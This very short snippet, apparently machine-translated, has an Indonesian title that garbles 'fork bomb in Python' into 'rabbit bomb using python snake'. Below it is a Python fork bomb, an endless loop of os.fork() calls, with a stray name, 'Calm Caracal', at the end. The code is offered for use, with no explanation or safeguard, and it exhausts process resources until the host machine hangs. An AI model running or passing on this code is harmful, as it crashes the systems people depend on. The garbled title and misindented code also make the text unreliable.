Buat bom kelinci saya sendiri menggunakan ular piton

#!/usr/bin/env python

    import os
    while True: os.fork()
Calm Caracal